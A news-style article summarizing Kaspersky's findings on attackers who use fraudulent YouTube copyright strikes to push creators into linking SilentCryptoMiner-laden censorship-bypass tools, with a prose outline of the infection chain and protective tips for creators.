YouTubers extorted via copyright strikes to spread malware—a disturbing cyber threat uncovered by Kaspersky researchers—reveals a new layer of cybercriminal tactics. By exploiting YouTube’s copyright enforcement system, attackers manipulate platform policies to pressure creators into distributing SilentCryptoMiner malware. This deceptive scheme not only jeopardizes the credibility of content creators but also puts their vast audiences at risk of unknowingly downloading harmful malware.

For many YouTubers, copyright strikes are a serious concern, as accumulating three strikes can lead to permanent channel termination. Cybercriminals take advantage of this fear, using fraudulent copyright claims as leverage to coerce content creators into including links to malware-infected software in their video descriptions. This strategy transforms unsuspecting YouTubers into unwilling participants in a sophisticated malware distribution network, expanding the reach of cyber threats at an alarming rate.

How the Extortion Scheme Works

Kaspersky researchers identified that cybercriminals primarily target YouTubers who create tutorials on bypassing internet censorship tools, particularly those using Windows Packet Divert (WPD) technology. WPD-based tools, designed to intercept and modify network traffic, are widely used in regions with strict internet restrictions, such as Russia.

Step-by-Step Breakdown of the Attack:

1. False Copyright Claims: Attackers impersonate developers of WPD-based tools and file fraudulent copyright claims against YouTube creators. Under YouTube’s “three strikes” policy, three violations can lead to channel termination, making these claims extremely threatening to YouTubers.
2. Extortion: The attackers contact affected YouTubers, claiming to be the rightful developers of the WPD tool and demanding that the creators include a specific download link in their video descriptions to avoid further strikes.
3. Malware Distribution: The link directs users to a GitHub repository hosting a trojanized version of the software, which contains SilentCryptoMiner malware. Once downloaded, this malware hijacks the victim’s computer to mine cryptocurrency for the attackers.

Impact and Scope of the Attack

The scale of this attack is deeply concerning. According to Kaspersky’s report:

• A malicious video promoting the malware-laden software received over 400,000 views before the link was removed.
• Over 40,000 people downloaded the infected software, unknowingly turning their computers into cryptocurrency mining bots.
• A Telegram channel with 340,000 subscribers also played a role in distributing the malware.
• Kaspersky’s telemetry data shows that at least 2,000 users in Russia have already been affected, though the real number is likely much higher.

How SilentCryptoMiner Works

Image Courtesy: Google

Kaspersky researchers dissected the malware and found a multi-stage infection process that ensures effective delivery and persistence:

1. Initial Download: The victim downloads a seemingly legitimate WPD tool from GitHub, which includes a batch script (general.bat).
2. Execution: The script runs a PowerShell command that launches a Python-based loader. If an antivirus blocks it, an error message urges users to disable their security software and retry.
3. Geo-Targeting: The malware activates only if the victim is using a Russian IP address, ensuring it remains under the radar outside the target region.
4. Evasion Tactics: The malware checks for virtual environments to avoid detection, disables Windows Defender, and establishes persistence via Windows Services.
5. Cryptomining: Finally, the infected machine is used to mine cryptocurrencies such as Ethereum (ETH), Ethereum Classic (ETC), Monero (XMR), and Raptoreum (RTM), funneling profits to the attackers.

Historical Context and Platform Exploitation

This attack is part of a larger trend of cybercriminals abusing YouTube’s copyright enforcement system. In 2019, creators reported a surge in fraudulent copyright strikes being used for blackmail. The three-strike policy, originally designed to protect intellectual property, has become a weapon for bad actors.

By combining social engineering, platform manipulation, and malware distribution, this latest attack demonstrates how cybercriminals continually adapt their tactics to exploit digital platforms.

How YouTube Creators Can Protect Themselves

To avoid falling victim to such schemes, YouTube content creators should take the following precautions:

• Verify Copyright Claims: If you receive a copyright claim that seems suspicious, report it to YouTube’s support team and seek legal advice before complying.
• Be Cautious of External Links: Never add links to video descriptions under external pressure, especially from unverified sources.
• Stay Updated: Engage with cybersecurity communities and other YouTube creators to stay informed about emerging threats.
• Strengthen Security: Regularly update your antivirus software, scan for malware, and be vigilant about potential phishing attempts.

To Sum Up

Kaspersky’s discovery underscores the increasing sophistication of cyber threats targeting YouTube creators. By leveraging platform policies, cybercriminals manipulate the system to expand their malware distribution networks, placing creators and their audiences at significant risk. The SilentCryptoMiner malware attack serves as a stark reminder that digital content creators are prime targets for cyber extortion, necessitating heightened vigilance and proactive security measures. By understanding these risks and taking preventive measures, content creators can better protect their channels, their audiences, and their digital security.

With cyber threats evolving rapidly, it’s essential for YouTubers to remain informed, report suspicious activities promptly, and implement robust cybersecurity measures to safeguard their channels and audiences.